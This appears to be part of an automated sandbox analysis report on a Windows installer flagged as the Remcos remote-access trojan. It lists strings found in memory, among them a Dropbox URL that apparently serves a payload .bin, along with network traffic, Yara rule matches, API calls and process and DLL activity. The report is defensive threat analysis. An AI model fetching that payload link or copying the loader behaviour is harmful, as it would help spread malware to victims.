Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docsend.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://experience.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.dropbox.coKh$
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.yahoo.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://navi.dropbox.jp/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://officeapps-df.live.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://officeapps.live.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/picker
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://pal-test.adyen.com
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paper.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://photos.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sales.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://showcase.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/(
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/6t
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/7
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/R
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090E5000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/cd/0/get/CmsIyjcNSqE9pfci-uOQ5iPpUwth
Source: IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com/rtK
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.docsend.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/S
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/pithos/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/playlist/
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4ev
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/static/api/
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.dropboxstatic.com/static/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hellofax.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.hellosign.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.paypal.com/sdk/js
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 162.125.6.18:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.125.6.15:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405421 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405421
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

System Summary

Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004033B6 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_004033B6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00406847 0_2_00406847
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00404C5E 0_2_00404C5E
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
Source: 25FC004658_Femetagershusenes.exe, 00000000.00000002.2941062350.0000000000456000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameequable.exed" vs 25FC004658_Femetagershusenes.exe
Source: 25FC004658_Femetagershusenes.exe Binary or memory string: OriginalFilenameequable.exed" vs 25FC004658_Femetagershusenes.exe
Source: 25FC004658_Femetagershusenes.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@3/11@2/2
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004033B6 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 0_2_004033B6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW, 0_2_004046E2
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402095
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\Documents\Emissionsbreve.ini Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\nsrBB11.tmp Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File read: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe"
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe"
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe" Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: sspicli.dll Jump to behavior
